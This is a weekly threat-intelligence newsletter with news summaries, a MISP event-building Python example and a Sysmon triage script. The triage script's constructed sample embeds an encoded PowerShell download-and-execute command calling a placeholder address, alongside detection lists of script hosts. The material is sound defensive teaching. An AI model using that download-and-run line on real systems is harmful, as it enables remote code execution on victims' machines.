Welcome back to the Kraven Security weekly newsletter, triaging the week. We round up the week’s top news stories, highlight our featured article, give you some learning resources, and finish with a few personal notes about what’s happening at the company. Enjoy!
Top 5 News Stories
Home Users Increasingly Targeted by Ransomware
A significant increase in Magniber ransomware attacks is targeting home users worldwide, encrypting their devices and demanding ransoms.
Top 4 takeaways:
🪲 The ransomware is spread through Windows zero-days, fake updates, and trojanized software cracks and key generators.
🧑💻 Victims receive a ransom note demanding $1,000, which increases to $5,000 if not paid within three days.
🩹 There is currently no free way to decrypt files encrypted by Magniber; the group patched the flaw that the free decryptor released by AhnLab in 2018 relied on.
🛡️ Users are advised to avoid software cracks and key generators as it’s not only illegal but also a common method used to distribute malware and ransomware.
Hacked Digital Classroom Software Used to Wipe Student Devices
Mobile Guardian, a digital classroom management platform, was hacked, leading to the remote wiping of data from at least 13,000 student devices.
Top 4 takeaways:
🌍 The breach affected instances in North America, Europe, and Singapore, with a significant impact reported in Singapore.
🙅♂️ Mobile Guardian stated there’s no evidence of data access or exfiltration by the hacker.
🛡️ The Ministry of Education (MOE) expressed strong concerns and is working to restore affected devices and will remove the Mobile Guardian Device Management Application from all iPads and Chromebooks.
🧑💻 MOE is deploying additional IT teams and providing extra learning resources to support affected students.
INTERPOL Recovers $40 Million Lost in Business Email Compromise Attack
INTERPOL recovered over $40 million stolen in a Business Email Compromise (BEC) attack on a Singaporean company.
Top 3 takeaways:
😈 The company was tricked into sending $42.3 million to an attacker-controlled account through a fraudulent email.
👮 INTERPOL’s I-GRIP mechanism and cooperation with Timor-Leste authorities led to the recovery and the arrest of suspects.
🌍 This was one of the outcomes of a global police operation in June, which arrested 3,950 people involved in various cyber scams, recovered millions of dollars, and highlighted the importance of swift, international cooperation in combating financial crimes.
IT Staff Targeted by New SharpRhino Malware to Spread Ransomware
The ransomware group Hunters International is using a new C# remote access trojan (RAT) called SharpRhino to breach corporate networks.
Top 4 takeaways:
🪲 The malware is spread through a typosquatting site impersonating the Angry IP Scanner website.
⚡ SharpRhino establishes persistence, provides remote access, and uses fileless malware techniques to evade detection.
😈 This group has become the 10th most active ransomware group in 2024, with 134 attacks in the first seven months, and is suspected to have ties to the defunct Hive ransomware group.
🛡️ Users should avoid sponsored search results, use ad blockers, bookmark official sites, establish backup plans, perform network segmentation, and keep software updated.
Windows Downdate Attack Downgrades Windows Updates to Roll Back Patches
Two zero days (CVE-2024-38202 and CVE-2024-21302) can be exploited to downgrade Windows systems and reintroduce old vulnerabilities.
Top 5 takeaways:
🪲 Attackers can force systems to roll back to older software versions, making them susceptible to past vulnerabilities.
⚡ According to the researchers, the attack is invisible to endpoint detection and response (EDR) solutions, and Windows Update continues to report the system as fully updated.
🧑💻 The researchers released a tool to demonstrate the technique. It takes over the Windows Update process and enables undetectable, persistent, and irreversible downgrades of critical OS components.
🧪 The findings emphasize the need for increased awareness and research into OS-based downgrade attacks, as well as the importance of reviewing design features within an OS as potential attack surfaces.
🛡️ Microsoft is working on a fix and has issued advisories with mitigation advice until the update is released.
Top Tips of the Week
Threat Intelligence
- Regularly communicate CTI insights to stakeholders. Keep decision-makers informed to guide strategic security decisions.
- Use CTI to enhance threat intelligence platforms (TIPs). Leverage insights for continuous improvement and optimization of TIP capabilities.
Threat Hunting
- Understand the value of threat intelligence in penetration testing. Use insights to enhance real-world attack simulations.
Custom Tooling
- Implement continuous monitoring for custom tools. Proactively identify issues, assess performance, and ensure ongoing reliability.
- Consider the accessibility of custom tools. Design interfaces and functionalities that cater to users with diverse needs and requirements.
- Regularly review custom tool access controls. Ensure that permissions align with organizational roles and responsibilities.
- Understand your specific needs before creating custom tools. Tailor solutions to your unique challenges for optimal effectiveness.
Feature Article
MISP (Malware Information Sharing Platform and Threat Sharing) is an open-source threat intelligence platform that allows you to share, collate, analyze, and distribute threat intelligence.
Today, you will learn how to start using MISP. You will learn about MISP events, how to create them, and how to add context to them using MISP’s galaxies and taxonomies. This will teach you the fundamentals of using MISP to fulfill your threat intelligence needs!
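The article walks through creating an event and attaching taxonomy and galaxy context. As an added illustration for this newsletter (not code from the MISP project or from the feature article), the following builds an event in the MISP core JSON format using only the standard library, so it runs offline without PyMISP or a server. The indicator values are constructed placeholders (a `.example` domain and an RFC 5737 address), and the ATT&CK cluster name is assumed to exist in the MITRE galaxy shipped with MISP; check it against your instance before importing.

```python
"""Build a MISP event (MISP core JSON format) without a server.

Added example for this newsletter, not code from the MISP project. Uses
the standard library instead of PyMISP so it runs offline. Indicator
values are constructed placeholders; the galaxy cluster name is assumed.
"""
import json
import re
import uuid
from datetime import date

# Subset of MISP attribute types and the category each belongs to.
TYPE_CATEGORY = {
    "domain": "Network activity",
    "ip-dst": "Network activity",
    "url": "Network activity",
    "sha256": "Payload delivery",
    "filename": "Payload delivery",
}

# Galaxy clusters attach as tags of the form misp-galaxy:<galaxy>="<cluster>".
GALAXY_TAG = re.compile(r'^misp-galaxy:[a-z0-9-]+="[^"]+"$')
# Taxonomy machine tags: namespace:predicate or namespace:predicate="value".
TAXONOMY_TAG = re.compile(r'^[a-z0-9-]+:[a-z0-9_-]+(?:="[^"]+")?$')


def make_tag(name):
    """Return a MISP Tag object, rejecting free-text tags that would not
    resolve to a taxonomy or galaxy on the instance."""
    if GALAXY_TAG.match(name) or TAXONOMY_TAG.match(name):
        return {"name": name}
    raise ValueError(f"not a taxonomy or galaxy tag: {name!r}")


def make_attribute(attr_type, value, to_ids=True, comment="", tags=()):
    """One indicator. to_ids=True marks it as fit for export to IDS/EDR
    blocklists; use False for context-only values."""
    if attr_type not in TYPE_CATEGORY:
        raise ValueError(f"unsupported attribute type: {attr_type}")
    return {
        "uuid": str(uuid.uuid4()),
        "type": attr_type,
        "category": TYPE_CATEGORY[attr_type],
        "value": value,
        "to_ids": to_ids,
        "comment": comment,
        "Tag": [make_tag(t) for t in tags],
    }


def build_event(info, attributes, tags=(), threat_level_id=2, analysis=1,
                distribution=1):
    """Assemble the event envelope. threat_level_id: 1 high, 2 medium,
    3 low, 4 undefined. analysis: 0 initial, 1 ongoing, 2 complete.
    distribution: 0 your org only, 1 this community, 2 connected
    communities, 3 all communities."""
    seen, unique = set(), []
    for attr in attributes:
        key = (attr["type"], attr["value"])
        if key not in seen:  # MISP rejects duplicate type/value pairs
            seen.add(key)
            unique.append(attr)
    return {"Event": {
        "uuid": str(uuid.uuid4()),
        "info": info,
        "date": date.today().isoformat(),
        "threat_level_id": str(threat_level_id),
        "analysis": str(analysis),
        "distribution": str(distribution),
        "published": False,
        "Tag": [make_tag(t) for t in tags],
        "Attribute": unique,
    }}


def build_example_event():
    """Constructed sample: a fake download site serving a trojanized tool."""
    attrs = [
        make_attribute("domain", "scanner-download.example", tags=["tlp:amber"]),
        make_attribute("ip-dst", "203.0.113.10", comment="hosting IP at time of analysis"),
        make_attribute("domain", "scanner-download.example"),  # duplicate, dropped
    ]
    return build_event(
        "Trojanized network scanner distributed from typosquatted site",
        attrs,
        tags=["tlp:amber",
              'misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002"'],
    )


if __name__ == "__main__":
    print(json.dumps(build_example_event(), indent=2))
```

The resulting JSON is what the MISP REST API accepts at `POST /events/add`; the tag validation matters because a free-text tag such as `Urgent Review` is accepted by MISP but carries none of the machine-readable context that lets consumers filter on TLP or pivot through a galaxy.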
Learning Resources
Discover How to Use Passkeys in Microsoft 365
If you are a Microsoft user, you should be using passkeys. They enhance Microsoft 365 security, eliminate the need for complex passwords, and can even be used for biometric authentication.
This comprehensive guide will teach you how to set them up and enforce their use through conditional access policies.
Unlock the Power of Sysmon
Sysmon is a Windows device driver and service that logs detailed system activity, such as process creation, network connections, and file and registry changes. It is often used by incident responders and threat hunters to reconstruct how a cyber attack unfolded.
It is also highly customizable and can fit your specific needs to reduce alert fatigue, provide granular visibility, and complement existing security tools.
This great presentation on Sysmon for Industrial Control System (ICS) environments explains the capabilities of Sysmon, deployment considerations, and practical tips for setting it up.
Learn How to Build Your Dream Cyber Security Home Lab
Home labs are perhaps the single greatest tool you can use to learn practical cyber security skills. This comprehensive guide walks you through how to set one up, the hardware and software considerations, networking components, storage options, and more.
A must watch for anyone interested in gaining hands-on cyber experience!
Quickly Find IOCs Using PowerSIEM (Sysmon + PowerShell)
PowerSIEM is a PowerShell script that can analyze Sysmon events dynamically to aid in malware analysis, threat hunting, and detection engineering. The script provides real-time information and removes the dependency on tools like Elastic or Splunk.
In this video, its creator (the legendary IppSec) demonstrates how you can use it to analyze common attack techniques, customize it to suit your needs, and more.
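Both the Sysmon resource above and PowerSIEM come down to the same operation: pull a Sysmon event, read its EventData fields, and decide whether it is interesting. As an added example for this newsletter (not code from Sysmon, PowerSIEM, or IppSec), the following parses a Sysmon Event ID 1 (ProcessCreate) record in the XML form that Windows exports, flags an Office application spawning a script host, and decodes a `-EncodedCommand` PowerShell payload. The sample event is constructed; the paths, the `invoice.docm` file name, and the 203.0.113.10 address (RFC 5737 documentation range) are placeholders.

```python
"""Triage Sysmon ProcessCreate (Event ID 1) records exported as XML.

Added example for this newsletter, not code from Sysmon or PowerSIEM.
The sample event is constructed; paths, file names and the 203.0.113.10
address are placeholders.
"""
import base64
import re
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -enc, ...).
# The 16-character floor stops "-ExecutionPolicy Bypass" from matching.
ENCODED_ARG = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def parse_sysmon_event(xml_text):
    """Return (event_id, {DataName: value}) from one exported Sysmon event."""
    root = ET.fromstring(xml_text)
    event_id = int(root.findtext("e:System/e:EventID", namespaces=NS))
    data = {d.get("Name"): (d.text or "")
            for d in root.iterfind("e:EventData/e:Data", NS)}
    return event_id, data


def decode_encoded_command(cmdline):
    """Decode the base64 UTF-16LE payload after -enc; None if absent/invalid."""
    match = ENCODED_ARG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def triage(xml_text):
    """Apply two ProcessCreate checks and return a list of finding strings."""
    event_id, d = parse_sysmon_event(xml_text)
    findings = []
    if event_id != 1:  # only ProcessCreate carries Image/ParentImage
        return findings
    parent, child = basename(d.get("ParentImage", "")), basename(d.get("Image", ""))
    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        findings.append(f"office-spawned-script-host: {parent} -> {child}")
    decoded = decode_encoded_command(d.get("CommandLine", ""))
    if decoded is not None:
        findings.append(f"encoded-powershell: {decoded}")
    return findings


# Constructed sample: a macro document launching an encoded downloader.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')"
SAMPLE_ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_EVENT = f"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>1</EventID></System>
  <EventData>
    <Data Name="UtcTime">2024-08-09 10:15:00.000</Data>
    <Data Name="Image">C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe</Data>
    <Data Name="CommandLine">powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -enc {SAMPLE_ENCODED}</Data>
    <Data Name="ParentImage">C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE</Data>
    <Data Name="ParentCommandLine">"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" /n invoice.docm</Data>
  </EventData>
</Event>"""

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENT):
        print(finding)
```

On a live host the same XML comes from `Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational'` with `.ToXml()` on each record, which is the pattern PowerSIEM-style scripts follow; the point of decoding the payload in the triage step is that the encoded form defeats simple string matching on `DownloadString` or the callback address.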
Personal Notes
🤔 This week at Kraven, we have focused on improving our email marketing and sales process. We have focused on building an email sales funnel that provides a ton of free value to our potential clients through templates, learning resources, and advice while also highlighting how our Coaching & Mentorship program can take their skills to the next level.
I feel we have neglected to tell customers about our unique service offering in the past or failed to answer concerns or questions holding them back. The new email sequence we are working on aims to tackle those roadblocks head-on and provide more free value to those who are not quite ready to make the jump. After all, our mission is to help everyone learn CTI, and that is the reason we produce high-quality, free learning resources.
Aside from sales, we have also been focused on delivering actionable resources like templates and kickstart guides. We currently have three templates in the works: one for Intelligence Requirements, one for a Collection Management Framework, and another for a CTI report. These templates are designed to save you time implementing common CTI processes at your organization, and we hope you find them valuable.